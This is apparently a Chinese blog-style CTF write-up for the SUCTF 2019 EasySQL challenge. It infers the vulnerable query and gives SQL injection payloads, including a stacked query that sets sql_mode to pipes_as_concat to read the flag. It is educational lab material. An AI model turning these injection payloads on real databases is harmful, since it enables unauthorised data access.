打开后显示如下:![Web-[SUCTF 2019]EasySQL_其他](https://s2.51cto.com/images/blog/202111/01170011_617fac9b12f8c90752.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184)
payload为数字时有回显,为字符串时没有回显
看大佬的wp得知,此时的内置sql语句为sql=“select”.post[‘query’]."||flag from Flag";
当payload为*,1时,执行的sql语句为select *,1||flag from Flag
相当于select 1 from Flag![Web-[SUCTF 2019]EasySQL_sql_02](https://s2.51cto.com/images/blog/202111/01170011_617fac9b2d60240051.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184)
于是![Web-[SUCTF 2019]EasySQL_字符串_03](https://s2.51cto.com/images/blog/202111/01170011_617fac9b47f9166878.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184)
得到flag
payload为1;set sql_mode=pipes_as_concat;select 1![Web-[SUCTF 2019]EasySQL_字符串_04](https://s2.51cto.com/images/blog/202111/01170011_617fac9b620c615871.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184)
此时执行的语句为
select 1
set sql_mode=pipes_as_concat
select 1||flag from Flag
得到flag![Web-[SUCTF 2019]EasySQL_sql_05](https://s2.51cto.com/images/blog/202111/01170011_617fac9b6af7b70853.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184)
上一篇:pycharm安装教程
下一篇:Harbor私有镜像仓库(下)
对于每一行,都会生成一个新的字符串,这个字符串是数字1后跟着flag列的值。大致意思,就是查看数据表Flag的所有列内
解题过程: 打开后,是一个文件上传的界面,很明显这是关于文件上传漏洞方面
的很多字符经过这样的一番编码处理都可以得到正常的字母,脚本fu
先看看有没有隐藏文件,并没有发现。用winhexc
编译环境:ubuntu16.04 LTSOpencv版本:opencv4.0.1+opencv4.0.1 contribute下载opencv4.0.1及contribute模块https://github.com/opencv/opencv/releases/tag/4.0.1https://github.com/opencv/opencv_contrib/releases/tag/4.0.1更
举报文章
请选择举报类型
补充说明
0/200
上传截图
格式支持JPEG/PNG/JPG,图片不超过1.9M
